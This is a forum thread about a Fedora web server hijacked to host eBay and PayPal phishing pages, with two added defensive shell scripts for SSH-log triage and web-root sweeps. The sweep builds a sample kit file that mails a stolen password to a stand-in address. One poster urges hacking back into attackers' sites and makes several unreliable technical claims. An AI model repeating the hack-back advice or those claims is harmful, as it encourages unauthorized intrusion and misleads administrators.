pajiao asked:
Phishing problem

Hi guys,

My server is constantly being used for phishing for eBay and PayPal. I am using Fedora Core 4. How did they do it, and what can I do to prevent it?

Thanks
duckax

There are many ways this could have happened and I just do not have enough details to go into specifics.

The best way to secure your server would be to hire experts to do it. PlatinumServerManagement can manage your server for $29 a month. You can hire them for one month just for the server hardening part.

http://www.platinumservermanagement.com/

You can also use the free Nessus Vulnerability Scanner to do a scan of your system and find security holes.

http://www.tenablesecurity.com/products/nessus.shtml

I hope this helps you.
Check out this awesome software and article

TraceAssure Toolbar

http://www.windowsitpro.com/mobile/pda/Article.cfm?ArticleID=50019&News=1

Reps
> .. has constantly being used as phishing for ebay ..
Could you please explain how they did that, and how you identified that it is your server?
SOLUTION
jhance
(This solution is only available to members.)
pajiao (asker)
I have been informed that my server has been used for phishing, and I saw the .cgi-bin folders commonly used. I do not know how it took place; likely through some web forms, as I suspected, since I did receive some emails spawned by my web forms without any user input.

What logs do I start with? What are the things I should be looking for?
> What logs do i start with?
your application logs, if any
You need to disable *all* and *every* application dealing with input data from the browser (other than the path in the URL itself) until you have identified the malicious application.
SOLUTION
Rich Rumble
(This solution is only available to members.)
When PayPal is informed by responsible users and admins that some box on some network is sending phishing scams, PayPal investigates.  If the ISP does nothing, PayPal blocks the ISP until they do something about it.  The next step is for the giant PayPal to file suit to stop the ISP because the ISP has showed negligence and is participatory in the phishing scam.  This brings in the U.S. Treasury Department and the Secret Service.  If the ISP doesn't attend to it at this point, the next step is federal court and the subpoena of the ISP's records.

This mostly happens because most outfits now think that software is enough, that is, until they're called into court and finally recognise that software solutions are not enough and they need to hire some human beings to actually track down the culprits and bring them to justice.

You can get infected by merely clicking on a website.  The problem was large at Google about a year ago because Google was not checking the validity of their search engine's results.  Links would often say one thing and point to some phishing mastermind's box.  Thus, both Yahoo and Google wound up in court with a request for all of their records and the feds got them, even if only in limited amounts.

Your best defense is to find out why PayPal named you as the source for phishing scams.  And that's intensive.  Looking for files in temp folders, with any execute permissions, .pl .php or otherwise, looking for a.bat, or vudo.c files, checking to see what IRC SpyKidz are all about, and the seemingly innocent links of search engines.  When you find the guilty files, you must then document it and keep it as evidence.

It would also help if you tracked down these events by using the extensive log files of Linux, Apache, and especially coordinating times and occurrences by using the log options of Bind.  Every access and query to your machine can be logged by Bind and it will reveal patterns of who is hammering away at your machine.

A few months ago php and forum software were compromised and quite a few sites were forced to shut down because no one was monitoring them using that old reliable, the human being.

Those who were using human beings to monitor caught the guys and were not infected or shut down.

Sometimes software is not the answer, and sometimes you just have to do it by hand.
pajiao (asker)
Sigh... I updated all the packages and still I got the phishing. I checked the Apache logs, nothing suspicious; I checked the secure logs and found loads of failed SSH root attempts. How can I prevent all these attempted root logins?

What other logs can I check, and what should I look out for?

How do all these phishing guys hack into Linux? Through what kind of vulnerabilities?
Could be a rootkit now... did you format and then reinstall the OS? You may consider paying a hosting service, or finding one for free on the net, until you can get your server and/or source code inspected. *nix can be hacked/rooted just like win32.
-rich
ASKER CERTIFIED SOLUTION
(This solution is only available to members.)
> How can i prevent all these attempted root logins?
you cannot (except disabling ssh)

> Thru what kinda vulnerabilities?
as I already said: most likely using a vulnerability in one of your web applications.
Did you check all your applications?
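The triage behind this exchange, as an added example that is not part of the thread or anyone's posted code: the scripted root guesses in /var/log/secure cannot be stopped from arriving, but they can be counted per source, checked for the one outcome that matters (an address that failed many times and was later accepted), and made harmless with two sshd_config directives. The log lines, host name, addresses, user name and config fragments below are constructed samples in the format OpenSSH writes; the firewall-block threshold of 5 is an arbitrary choice.

```shell
#!/bin/sh
# Added example (not from the thread): triage failed root SSH logins from
# /var/log/secure and check the sshd_config settings that make them irrelevant.
# The log lines and configs below are constructed samples in OpenSSH's format;
# the host name, addresses and user names are made up.

SAMPLE_LOG='Jan 10 03:14:01 web sshd[2211]: Failed password for root from 203.0.113.7 port 4412 ssh2
Jan 10 03:14:02 web sshd[2213]: Failed password for root from 203.0.113.7 port 4413 ssh2
Jan 10 03:14:02 web sshd[2215]: Failed password for root from 203.0.113.7 port 4414 ssh2
Jan 10 03:14:03 web sshd[2217]: Failed password for root from 203.0.113.7 port 4415 ssh2
Jan 10 03:14:03 web sshd[2219]: Failed password for illegal user admin from 203.0.113.7 port 4416 ssh2
Jan 10 03:20:11 web sshd[2301]: Failed password for root from 198.51.100.9 port 51002 ssh2
Jan 10 03:21:45 web sshd[2333]: Accepted password for webadmin from 192.0.2.44 port 39001 ssh2
Jan 10 03:25:00 web sshd[2350]: Accepted publickey for root from 203.0.113.7 port 4490 ssh2'

# Failed root logins per source address, busiest first ("count ip").
failed_root_by_ip() {
    awk '/sshd\[[0-9]+\]: Failed password for root from / {
             for (i = 1; i <= NF; i++) if ($i == "from") n[$(i + 1)]++
         }
         END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Sources with at least $1 failures: nobody types that many passwords by hand
# in a few seconds, so these are scripts and candidates for a firewall block.
flag_scripted_sources() {
    failed_root_by_ip | awk -v t="$1" '$1 >= t { print $2 }'
}

# The line that matters most: an address that failed repeatedly and later got
# an "Accepted" line. If one shows up, the guessing worked and the box has to
# be treated as compromised rather than hardened.
accepted_from_attackers() {
    awk '/sshd\[[0-9]+\]: Failed password for / {
             for (i = 1; i <= NF; i++) if ($i == "from") failed[$(i + 1)] = 1
         }
         /sshd\[[0-9]+\]: Accepted / {
             for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i + 1)
             if (ip in failed) print ip, $6, $7, $8, $9
         }'
}

# Read an sshd_config on stdin and report the two directives that decide
# whether scripted root guessing can ever succeed. A directive that is absent
# or commented out takes OpenSSH's default of "yes", the weak setting.
sshd_config_check() {
    awk 'BEGIN { root = "yes"; pw = "yes" }
         /^[ \t]*#/ { next }
         $1 == "PermitRootLogin" { root = $2 }
         $1 == "PasswordAuthentication" { pw = $2 }
         END {
             weak = 0
             if (root != "no" && root != "without-password") weak++
             if (pw != "no") weak++
             print "PermitRootLogin=" root
             print "PasswordAuthentication=" pw
             print "weak_settings=" weak
         }'
}

# Constructed configs: the weak default beside the corrected one.
WEAK_SSHD_CONFIG='Protocol 2
#PermitRootLogin yes
PasswordAuthentication yes'

HARDENED_SSHD_CONFIG='Protocol 2
PermitRootLogin no
PasswordAuthentication no
AllowUsers webadmin'

# Stand-alone use: sh ssh_triage.sh /var/log/secure /etc/ssh/sshd_config
if [ $# -ge 1 ]; then
    printf '== failed root logins by source ==\n'; failed_root_by_ip < "$1"
    printf '== scripted sources (>= 5 failures) ==\n'; flag_scripted_sources 5 < "$1"
    printf '== accepted logins from attacking sources ==\n'; accepted_from_attackers < "$1"
    [ $# -ge 2 ] && { printf '== sshd_config ==\n'; sshd_config_check < "$2"; }
fi
```

On the sample, 203.0.113.7 fails four root passwords in three seconds and is later accepted with a public key for root; that second fact, not the failure count, is what decides whether this is a hardening job or an incident. With `PermitRootLogin no` and `PasswordAuthentication no` the failed lines keep coming but can no longer succeed, which is the practical answer to "you cannot prevent them".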
pajiao (asker)
>as I already said: most likely using a vulnerability in one of your web applications
Did you check all your applications?

I didn't know what to check for in my applications, seriously. Anyway, I am using Apache 2.
Apache is the web server; applications are your scripts run by Apache: Perl, PHP, whatever...
You need to check all those scripts which accept and process input from the client.
pajiao (asker)
Yes, I know the scripts and know where the places are where input from clients is taken, but what is there to check for in those? How can they be a risk, and how are these web forms exploited by phishers?
SOLUTION
(This solution is only available to members.)
Apache 2 should block those login attempts, in fact, I believe this was solved in Apache 1.3.31 or something like that, definitely after any Apache 2.  There was a long string of attempts before Apache was upgraded past the old stable Apache 1.3 version.

The hacker gang then switched to attacking php.  Which they did quite effectively this year, shutting down numerous boards running phpBB2.  And yes, it is through the forms that they break in.  There's a patch for that though, I believe.  I think it was something like guitarworld or one of them that got shutdown, along with quite a few others, a few months back.  The snupigood guy was also involved in, or at least his site was fully infected with, redirected google and yahoo links to porn sites and pedophile sites; you may recall herr deputy director homeland security getting caught?  That was the ring.  And myspace was in the center of it.  Surely you've heard about that exploit?

The phishing scam is sophisticated enough to zombie your box; that's where it starts probing other sites using your server as the authority, this starts with some probes, but winds up sending emails and other stuff that the zombie controller logs into your zombied box with.  He can also cover his tracks, but he cannot cover the Bind and DNS logs tracks and certain secure logs, etc..

Go get rkhunter and run it.  http://www.rootkit.nl/projects/rootkit_hunter.html

I believe that's the correct link.

I believe what I did to stop such attempts was to change the permissions to no execute in the temp folders, all of them.  Like I said, KDE was vulnerable and as far as I know still is.  Which means, one visit to the wrong page and you're hit.  At snupigood, we allowed the dumb site to try its infection and watched and gathered all the files it installed.  One site even installed the source code and tried to compile it!  It was that sophisticated.  It then had a section to recompile the kernel itself.  Which would have meant that our box would have belonged to the Night of the Walking Dead as it ate us alive.  Fortunately, we were ahead of the game and kept all the files for evidence.

Interesting bunch of files; hackers are stupid enough and publicity oriented enough to start signing their software.  They were proud of this high level programming, until I guess Interpol and the FBI caught them.  The Secret Service has to be involved here too because phishing comes under their jurisdiction.

You just have to tediously check everything and start a watch, an around the clock monitor of who is attacking your system.  Try to figure out who they are, where they are at, and do what every good agent does, investigate the hell out of them.

Your box should not allow remote root login, there's a setting for that.  Then, it should be set to log and stop any attempted logins over three occurring within some time frame, say 5 within 5 seconds or 5 within a minute.  If you look at your logs and it shows an attempt every second, or more than one per second, figure it out, no one can type or click and point that fast, it's a script.

Good Luck again!
pajiao (asker)
The attempted root login is definitely a script.

How I know phishing was done is that they had .update, .ebay or .confirm folders in my home www directory, and within them are all those PHP files that fish for user details. I have already disabled all my PHP scripts that do form submission, but they are still around.

GinEric, what you did sounds deep, and I confess I didn't know how to do that!
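Two pieces of advice in this thread, "check all those scripts which accept and process input from the client" and the find-the-dropped-folders work pajiao describes (.update, .ebay, .confirm under the web root, PHP inside them), plus GinEric's no-execute temp folders, come down to the same sweep of the filesystem. The script below is an added example, not code from the thread or from any poster: it lists hidden directories and the scripts inside them, shows where the web server user could have written files, flags form handlers that pass client input into mail() or a shell, and checks whether /tmp is mounted noexec (the usual way to get GinEric's no-execute temp folder). The sample web root, its files and the /proc/mounts lines are constructed for the example; the kit paths are the ones pajiao names, everything else is assumed.

```shell
#!/bin/sh
# Added example (not from the thread): sweep a web document root for a phishing
# drop like the one pajiao found (hidden dot-directories holding PHP), list
# where the web server user could write, audit the site's own form scripts for
# the input-to-mail() path he suspected, and check /tmp for noexec.
# The sample tree and mount table below are constructed for this example.

# Hidden directories under ROOT, relative to ROOT. Kits hide in dot-directories
# because plain "ls" and most directory indexes skip them.
find_hidden_dirs() {
    ( cd "$1" && find . -type d -name '.*' ! -name . | sed 's|^\./||' | sort )
}

# Server-side scripts anywhere below a hidden directory: a legitimate site
# rarely serves PHP/CGI from such a place.
find_scripts_in_hidden_dirs() {
    ( cd "$1" && find . -path '*/.*' -type f \
          \( -name '*.php' -o -name '*.cgi' -o -name '*.pl' \) \
          | sed 's|^\./||' | sort )
}

# World-writable files and directories: where a script running as the web
# server user, or an attacker who got a shell as that user, can drop files.
find_world_writable() {
    ( cd "$1" && find . -perm -0002 ! -name . | sed 's|^\./||' | sort )
}

# Scripts that read client input AND reach a dangerous sink, as "file: sink".
# A formmail that feeds $_POST straight into mail() is exactly the script that
# sends e-mail without any user having filled in the form.
audit_input_scripts() {
    ( cd "$1" && find . -type f \( -name '*.php' -o -name '*.cgi' -o -name '*.pl' \) \
          -exec grep -lE '\$_(GET|POST|REQUEST)|param\(|QUERY_STRING' {} \; \
          | sed 's|^\./||' | sort | while IFS= read -r f; do
              for sink in 'mail(' 'system(' 'exec(' 'passthru(' 'eval(' 'open('; do
                  grep -qF "$sink" "$f" && printf '%s: %s\n' "$f" "$sink"
              done
          done )
}

# Read /proc/mounts (or "mount" output in the same layout) on stdin and report
# whether /tmp is its own filesystem mounted noexec.
tmp_mount_check() {
    awk '$2 == "/tmp" { found = 1
                        print ($4 ~ /(^|,)noexec(,|$)/) ? "/tmp noexec ok" : "/tmp executable WEAK" }
         END { if (!found) print "/tmp not a separate mount WEAK" }'
}

# Constructed mount table: /tmp is separate but still executable.
MOUNTS_SAMPLE='/dev/hda2 / ext3 rw 0 0
/dev/hda5 /tmp ext3 rw,nosuid,nodev 0 0
none /dev/shm tmpfs rw 0 0'

# Build a throwaway web root shaped like the compromise described in the
# thread; prints its path. Everything in it is made up.
build_sample_webroot() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/.ebay/signin" "$root/forms" "$root/images"
    # The kit: collects the password and mails it to the phisher.
    printf '%s\n' '<?php mail("drop@example.invalid", "acct", $_POST["pw"]); ?>' > "$root/.ebay/signin/login.php"
    printf '%s\n' '<html>Sign in to your account</html>' > "$root/.ebay/index.html"
    # The site's own form handler with the recipient taken from the form:
    # an open mail relay for anyone who posts to it.
    printf '%s\n' '<?php mail($_POST["to"], "contact", $_POST["msg"]); ?>' > "$root/forms/contact.php"
    printf 'GIF89a\n' > "$root/images/logo.gif"
    chmod -R go-w "$root"
    chmod 0777 "$root/images"    # a writable upload directory, the likely drop point
    printf '%s\n' "$root"
}

# Stand-alone use: sh webroot_sweep.sh /var/www/html
if [ $# -ge 1 ]; then
    printf '== hidden directories ==\n'; find_hidden_dirs "$1"
    printf '== scripts in hidden directories ==\n'; find_scripts_in_hidden_dirs "$1"
    printf '== world-writable ==\n'; find_world_writable "$1"
    printf '== input scripts with dangerous sinks ==\n'; audit_input_scripts "$1"
    [ -r /proc/mounts ] && tmp_mount_check < /proc/mounts
fi
```

On the sample tree the sweep finds the .ebay kit and its login.php, the 0777 images directory as the place it could have been written, and both mail()-calling form handlers; the site's own contact.php is the one to fix or remove, since taking the recipient from the form is what turns a contact page into a spam relay. Anything the sweep turns up should be copied off and kept before it is deleted, since it is the evidence.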
Did somebody click on one of those phishing scam emails?  That is how they zombie your site, by storing their scripts in folders that shouldn't even be on your server.

The law is this: if someone accesses my site, they have given me full permission to access any information they put on my site, particularly if they start altering the operation of my site.  And if that information leads back to their site and a surreptitious activity there of programming and scripts that automatically invade my site for the purposes of infringing my copyrights, then I have the absolute legal authority to gather evidence, even if I have to then access their site and inspect, or copy, files, which they are using to harvest my copyrighted materials and original creations.

So, if someone breaks in and this results in a detriment to my site, I have the right to go right back and get the proof from their site that they did this.

In any case, I'm not going to roll over and pee for any hacker, I'm going to strike back with legal force and prosecute. bad dog that I am, or, rather, cougar or black panther that I am.

An act of agression is a strike which demands a counterstrike.

These phishers are real criminals.  I personally feel that too many software security outfits have chosen to ignore them for too long using software patches to do so.  The guys in the New York Times, last week, who got only four years did not get enough time for the crime of identity theft, which is grand larceny, stealing from hard working people; New York should have given one unrepentant guy whose excuse is "I can't help it," 20 years, not 4.  He's been in jail before for this, they know him, and yet New York City will probably let him out to do the same thing again in about a year.  It's ridiculous.  As ridiculous as giving an armed robber of a bank one year; it's not going to deter any criminal from going right back out and doing it again.  They figure, one year is worth a million dollars.  20 won't be.

The old Linux server is sitting behind me.  When I fire it back up for copying of files on it, I'll recopy the entire set of evidence that shows just how one of them breaks into and installs even source code and then compiles it on an unsuspecting server.  I won't release any of this code because it is too sensitive.  But I will name the files and explain how anyone can get remoted and zombied by the mere click on a malicious web site.

In the end, you have to have a human being monitoring the network and computer systems; there is no other way.
P.S.:  You can send an email to spoof@eBay.com or spoof@PayPal.com and I believe they will respond.  Perhaps even go to PayPal and find the security guys there and tell them your story.  This may help you to get off all phishing lists and straighten things out for you.
> The law is this:
somewhere, and in other places it's another law.

> So, if someone breaks in and this results in a detriment to my site, I have the right to go right back and get the proof from their site that they did this.
NO

> These phishers are real criminals.
agreed, but those web site owners running their website with tons of vulnerable scripts which allow frauds to users are criminals too. That's at least legal law in some European countries, and that's not that bad 'cause this way you get someone to be responsible for your damage (as user ;-)

GinEric, no offence meant, but you have to look on other countries practice, sometimes, somehow :-)
Sounds like New York City, and just the kind of thinking that protects muggers on the subway, to me.

However, Copyright Law is a Federal Law, National Security applies since phishing is under the jurisdiction of the Secret Service, and Copyright Law is under the Jurisdiction of the Federal Bureau of Investigation, the combination clearly supports protection of property, a Constitutional Right, and self defence, a human right.

No offense taken, but I'm not under any other country's laws than the United States of America, therefore, I don't care much about other world laws, since they've been pretty much self-serving for the elite few for what, 7,000 years now(?)

The irony is this: most of the phishing and other hacking gangs are led by at least one international spy retiree, nearly all from these "other countries," and a lot of these countries protect them, even encourage them, as long as they report back on their progress at breaking into American computers.  Why?  Money.  It's always money that drives the protection of criminal activity.  And it doesn't matter whose defense department it's at, even our own, breaking and entering is still burglary, and Internet cat burglars should not be protected by such foreign laws and agreements.

Let the foreign dignitaries argue with our representatives; no American is going to support subjugation to foreign law on American soil, and rightfully so.

The so-called free world should stop and consider that until we arrived, human beings had no inalienable rights.  Yes, the idea originated at Edinburgh, but we put it into law.  I know of nothing more distasteful to foreign governments than American law and especially our Bill of Rights, and that cantankerous definition that makes We The People the government.   This might give their people the idea that they are somehow free too, and that alone would topple any self-serving government and the criminals that run them.

I've looked on all other country's practices, for all of their histories, and at best I'm disappointed with every one of them.  The worst I've been accused of is telling the truth and that pretty much day in and day out because they tend to mislead my friends at home about their rights here in favor of those ideas that have spewed from the old world's self serving tyrants for all of those 7,000 years.

They can speak and I can disagree, the first right nearly all other country's government detest, the right of every American to say whatever they want, which may, in some cases, expose the old thinkology that makes their imposition of censorship succeed.  In the end you have to decide for yourself: freedom of thought or mind police.

And when it comes to a foreign national breaking into any American computer, every American has the God given right to fight back without reservation against what amounts to an attack on the U.S.  Here, at least, we hold that an attack against one of us is an attack against all of us.

I think with the Pentagon, Treasury, and Justice behind me, and every American, the only sure National Security is one that recognises each individual has the duty [not just the responsibility] to defend this soil and this people, even if it means the best defense is a good offense.  Simply because even the common thief will flee when his or her victim turns and fights.

The idea is too fundamental to be subjugated to law, which is what makes it inalienable, and phishers from overseas invading Americans' computers and gathering data, especially personal and banking data about any American, is a threat to our National Security, therefore, it comes under the National Security laws which are designed to protect only one thing, Americans against foreign invasion.  And since these attacks can be devastating to individuals, and we hold individuals to be of more value than collectives and committees, such an attack on the one is still an attack on all of us.

I don't want to engage the scapegoated websites who were unwittingly used, the battle goes directly to the attacker, I want the hacker and phisher who started the debacle.  I pretty much know that innocent websites can and are used by hackers and phishers as their scapegoat, even if their governments try to protect them; let their officials argue it with our officials, but our officials must stand behind us, not them, in all cases.

Perhaps the worst case scenario is that these foreign governments are aiding and abetting the collection of data on Americans, building databases so that they can use them as a weapon against America.  It's not so far fetched as it seems.  Treasury certainly recognises it, and the Pentagon recognised it long ago when they commissioned the invention of the Internet for the sole purpose of American National Security because they knew the best defenders were the people themselves, each and every American, that does have the right to defend against such invasions.

The strategy of economic attack has always been the purview of illegitimate governments and institutions.  And economic attack at the personal level is where it all starts.  Which makes the counterattack a necessity, the duty, of every American.

Notwithstanding the whinings of foreign governments, our stance, in general, is "live with it!"
> ..  I'm not under any other country's laws than the United States of America, ..
well, that's just one out of roughly 190 others, and still a minority (except in business;-)
so there may be roughly 189 which ignore this one ...